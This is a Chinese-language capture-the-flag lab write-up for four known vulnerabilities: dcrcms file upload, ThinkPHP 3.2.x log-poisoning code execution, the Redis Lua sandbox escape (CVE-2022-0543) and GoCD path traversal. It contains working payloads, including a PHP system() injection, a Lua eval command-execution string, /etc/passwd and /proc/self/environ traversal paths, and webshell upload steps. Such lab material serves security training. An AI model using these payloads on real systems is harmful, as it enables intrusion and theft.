中级001 🌸dcrcms 文件上传 （CNVD-2020-27175)🌸

原因：
稻草人企业站存在文件上传漏洞，攻击者可利用漏洞获取服务器控制权。 用户名密码：admin 123456 （网站）
解决方案：

step1：输入账号 密码

http://10.11.12.28:62350/dcr/login.htm

上传新闻类型的一句话木马

burp suite 拦截 修改类型为 jpeg

中国蚂蚁剑即可

中级002 🌸thinkphp3.2.x 代码执行🌸

step1：burpsuite 抓包

step2: 改包头

写入命令ls /tmp
GET /index.php?m=–><?=system(ls%20/tmp);?> HTTP/1.1
出现报错,就写入日志

step3 查看错误日志

http://10.11.12.28:59934/Application/Runtime/Logs/Common/23_08_20.log

step4 根据错误日志引入phpinfo

http://10.11.12.28:59934/index.php?
m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_08_20.log

中级003 🌸Redis Lua沙盒绕过 命令执行（CVE-2022-0543）🌸

step1： 下载Redis客户端,连接redis

或者命令行redis-cli.exe -h 10.11.12.28 -p 43510

step2: 执行命令获取id

eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“id”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

step3: 执行命令ls /tmp获取flag

eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“ls /tmp”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

中级004 🌸GoCD 任意文件读取漏洞 (CVE-2021-43287)🌸

原因：
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞，可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd 对文件进行读取。

解题思路：

step1：进入题解按时目录获得下载文件

#### step2 获得/proc/self/environ下的flag

漏洞是任意文件读取,靶场中flag是在tmp目录下，也没办法查看目录下的文件
/proc/self/environ是Linux系统下的环境变量文件，用于保存系统的一些变量。

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/proc/self/environ